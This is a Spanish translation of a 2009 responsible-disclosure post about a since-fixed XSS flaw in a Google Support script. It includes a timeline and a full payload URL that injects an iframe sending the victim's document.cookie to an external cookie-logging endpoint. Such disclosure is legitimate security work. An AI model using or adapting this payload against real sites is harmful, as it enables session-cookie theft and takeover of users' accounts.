Vulnerabilidad XSS Universal en todos los Servicios Google puede comprometer su información personal
Vulnerabilidad Reportada: 18-Abril-2009 9.33 pm
Respuesta de Google: 18-Abril-2009 10.19 pm (Wow! eso es súper rápido para un sábado )
Vulnerabilidad Reparada: 05-Mayo-2009 7.05 pm
Cambio Propagado: 07-Mayo-2009 3.19 pm
Recientemente informé de una falla cross-scripting (XSS) a Google, que ahora ya está arreglada. La vulnerabilidad existía en el Script Python del Soporte de Google en donde una URL maliciosa no era depurada del caracter XSS ' (comilla simple) antes de ponerlo dentro de la variable logURL de javascript. Como resultado, era posible romper el encapsulamiento de la declaración var y ejecutar comandos javascript arbitrarios en el dominio principal Google.com.
La única limitación eran los siguientes caractéres que eran o bien filtrados o codificados para url - " (comillas dobles) < > (espacio) { }. Sin embargo, esta protección podía ser sorteada fácilmente. Puede escribir un comando javascript para robar cookies de sesión [gracias a que caractéres como ' ; . ( ) / = +aún estaban disponibles] y enviarlos a mi sitio malicioso. Vea el ejemplo que se da abajo.
Su cookie del dominio Google.com es el cookie central de autenticación única (SSO) para todos los servicios google. Una vez que alguien cualquiera lo obtenga, él o ella pueden usarlo para
1. Robarle sus emails.
2. Robarle sus contactos.
3. Robarle sus documentos.
4. Robarle sus código.
5. Robarle sus sitios.
6. Robarle sus website analytics.
7. Poner una entrada trasera en su página de inicio de iGoogle con gadgets maliciosos.
…. y deben haber aun varias cosas más que quedan con las que podrían jugar.
Un código de una sencilla Prueba de Concepto puede mostrar su cookie de Google.com en un cuadro de alerta:
http://google.com/support/webmasters/bin/answer.py?answer=34575&cbid=-1oudgq5c3804g
Un ejemplo más de la vida real donde un atacante silenciosamente transfiere su cookie Google.com a su sitio maligno:-
http://google.com/support/webmasters/bin/answer.py?answer=34575&cbid=-1oudgq5c3804g';ifr=document.createElement('iframe');ifr.src='http:'+'//www.securethoughts.com/security/cookielogger/log.cgi?cookie='+escape(document.cookie);document.body.appendChild(ifr);//src=cb&lev=index
Quiero agradecer al equipo de Seguridad de Google por sus rápidas respuestas y arreglo a este serio problema en tiempo y forma. Si piensa que Google se tomó mucho tiempo para arreglar esta vulnerabilidad, piénselo de nuevo. Este script de python es usado en muchos lugares. Intente esta soncera en Google para ver el uso de este script en casi todos los Servicios Google.
Fuente:http://securethoughts.com/2009/05/universal-xss-vulnerability-in-all-google-services-can-compromise-your-personal-information/
Traducción para Segu-info:http://blog.segu-info.com.ar/2009/05/vulnerabilidad-xss-universal-en-todos.html